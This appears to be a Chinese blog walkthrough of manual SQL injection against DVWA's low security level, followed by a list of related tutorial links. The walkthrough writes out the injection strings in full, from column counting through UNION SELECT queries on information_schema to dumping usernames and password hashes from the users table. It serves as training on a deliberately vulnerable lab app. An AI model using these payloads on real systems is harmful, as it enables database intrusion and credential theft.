DVWA之low级别SQL Injection
2017-09-14 19:24
429 查看
输入1,返回正常,输入1‘ and ’1‘=’2,返回空,输入1‘ or 1234=1234 #
说明存在字符型注入。
然后猜解字段数,输入1‘ order by 1 #,返回正常,输入1’ order by 2 #,返回正常
输入1‘ order by 3 #,报错,说明只有两个字段,即First name、Surname。
确定显示的字段顺序
输入1′ union select 1,2 #,查询成功:说明执行的SQL语句为select First name,Surname from 表 where ID=’id’…
获取当前数据库,执行1' union select 1,database() #,返回正常
说明当前数据库为dvwa
获取数据库中的表。1′ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #,查询成功
说明两个表名分别为guestbook,users。
获取字段名,输入1′ union select 1,group_concat(column_name) from information_schema.columns where table_name=’users’ #,查询成功
最后1′ or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #,查询成功
相关文章推荐
- DVWA系列之2 low级别SQL注入
- DVWA系列之22 low级别上传漏洞
- DVWA系列之7 low级别命令执行漏洞
- DVWA - SQL Injection (low, medium, high)
- 《11招玩转网络安全》之第四招:low级别的DVWA SQL注入
- DVWA - SQL Injection (Blind) (low)
- DVWA-1.9全级别教程之SQL Injection
- DVWA-1.9全级别教程之SQL Injection(Blind)
- DVWA - Command Injection (low, medium, high)
- SQL 手动注入学习实战 —— dvwa 从low到impossible《low篇》
- DVWA-1.9全级别教程之File Upload
- SQLmap注入学习实战 —— dvwa 从low到impossble
- DVWA系列之3 medium级别SQL注入
- DVWA系列之9 high级别命令执行漏洞
- DVWA-1.9全级别教程之XSS(Reflected)&XSS(Stored)
- dvwa学习之七:SQL Injection
- dvwa之sql注入学习(不同级别)
- DVWA系列之23 medium级别上传漏洞分析与利用
- DVWA-1.9全级别教程之CSRF
- DVWA - CSRF (low, medium, high)